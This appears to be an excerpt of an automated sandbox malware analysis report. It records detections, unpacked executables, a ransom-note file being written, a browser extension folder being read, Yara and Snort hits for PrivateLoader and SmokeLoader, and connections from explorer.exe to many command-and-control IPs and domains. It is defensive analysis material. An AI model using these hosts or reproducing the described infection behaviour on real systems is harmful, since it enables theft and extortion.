Source: C:\Users\user\AppData\Local\Temp\6000.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F09E.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\11.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F86F.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\rrjthgj	Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\759F.exe	Unpacked PE file: 6.2.759F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Unpacked PE file: 12.2.6C74.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Unpacked PE file: 14.2.759F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Unpacked PE file: 17.2.759F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\AF5C.exe	Unpacked PE file: 23.2.AF5C.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Unpacked PE file: 24.2.6C74.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\9B15.exe	Unpacked PE file: 26.2.9B15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\86ED.exe	Unpacked PE file: 27.2.86ED.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E8B1.exe	Unpacked PE file: 29.2.E8B1.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Unpacked PE file: 32.2.759F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6000.exe	Unpacked PE file: 33.2.6000.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Unpacked PE file: 38.2.build2.exe.400000.0.unpack

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File created: C:\Users\user\_readme.txt

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.233.24.19:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.233.24.19:443 -> 192.168.2.3:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.66.203.53:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.233.24.19:443 -> 192.168.2.3:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49779 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 759F.exe, 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, AF5C.exe, 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, AF5C.exe, 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E8B1.exe, 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, E8B1.exe, 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, 6000.exe, 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.378976000.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.378976000.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: TEST_mi_exe_stub.pdb source: 6C74.exe, 00000018.00000003.487043916.0000000003170000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\lid.pdb source: file.exe, 00000000.00000000.352517490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, rrjthgj, 00000004.00000000.435807924.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: XVC:\lid.pdb source: file.exe, 00000000.00000000.352517490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, rrjthgj, 00000004.00000000.435807924.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 759F.exe, 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, AF5C.exe, 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, AF5C.exe, 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E8B1.exe, 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, E8B1.exe, 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, 6000.exe, 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: eex.pdb source: explorer.exe, 00000001.00000000.378976000.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\jegeg\fuvimum\72 medu.pdb source: C2B9.exe, 00000013.00000000.453422827.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\felisupitazaz\tabeg\poriyo-zu.pdb source: explorer.exe, 00000001.00000003.445200516.00000000059E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.437889073.00000000059E3000.00000004.00000001.00020000.00000000.sdmp, 759F.exe

Spreading

Yara detected PrivateLoader

Source: Yara match	File source: 21.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.86ED.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AF5C.exe.27415a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.86ED.exe.27015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.9B15.exe.26615a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.AF5C.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.759F.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.759F.exe.22f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.759F.exe.22515a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.86ED.exe.27015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AF5C.exe.27415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.E8B1.exe.28f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.E8B1.exe.28f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.6000.exe.22815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6000.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.759F.exe.22d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.9B15.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.E8B1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.9B15.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.759F.exe.22515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.759F.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.6000.exe.22815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.86ED.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.AF5C.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.E8B1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.9B15.exe.26615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Code function: 5_2_00404AB0 SetCommTimeouts,PurgeComm,ClearCommError,FindVolumeClose,LoadLibraryA,GetProfileIntW,ReadConsoleInputW,GetProfileIntW,VirtualQuery,GetLogicalDriveStringsW,SetUnhandledExceptionFilter,GetVolumePathNameW,FindVolumeClose,

5_2_00404AB0

Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: toobussy.com
Source: C:\Windows\explorer.exe	Network Connect: 37.34.248.24 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 123.140.161.243 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 80.66.203.53 443	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: colisumy.com
Source: C:\Windows\explorer.exe	Domain query: astoriaresidency.com
Source: C:\Windows\explorer.exe	Network Connect: 211.168.53.110 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: potunulit.org
Source: C:\Windows\explorer.exe	Network Connect: 190.219.153.101 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 187.251.132.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.9.74.80 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.233.24.19 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.7 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 177.254.85.20 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 211.119.84.112 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: shsplatform.co.uk
Source: C:\Windows\explorer.exe	Network Connect: 190.224.203.37 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.143.161.89 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.3:52387 -> 8.8.8.8:53

Yara detected PrivateLoader

Source: Yara match	File source: 21.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.86ED.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AF5C.exe.27415a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.86ED.exe.27015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.9B15.exe.26615a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.AF5C.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.759F.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.759F.exe.22f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.759F.exe.22515a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.86ED.exe.27015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AF5C.exe.27415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.E8B1.exe.28f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.E8B1.exe.28f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.6000.exe.22815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6000.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.759F.exe.22d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.9B15.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.E8B1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.9B15.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.759F.exe.22515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.759F.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.759F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.6000.exe.22815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.86ED.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.AF5C.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.E8B1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.9B15.exe.26615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49780

C2 URLs / IPs found in malware configuration

